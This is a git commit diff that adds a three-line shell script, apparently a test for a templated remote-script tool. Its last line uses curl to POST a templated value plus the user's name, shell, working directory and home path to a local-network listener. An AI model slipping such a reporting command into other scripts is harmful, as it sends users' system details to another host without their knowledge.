Add files via upload
parent
5f90ccd8e6
commit
5f6f01e9ab
|
@ -0,0 +1,3 @@
|
|||
myvariable={{rfsvars["myvariable"]}};
|
||||
echo $myvariable > textfile.txt;
|
||||
curl -X POST -d "recieved=$myvariable&user=$USER&shell=$SHELL&pwd=$PWD&home=$HOME" http://192.168.1.146:5000/l
|
Loading…
Reference in New Issue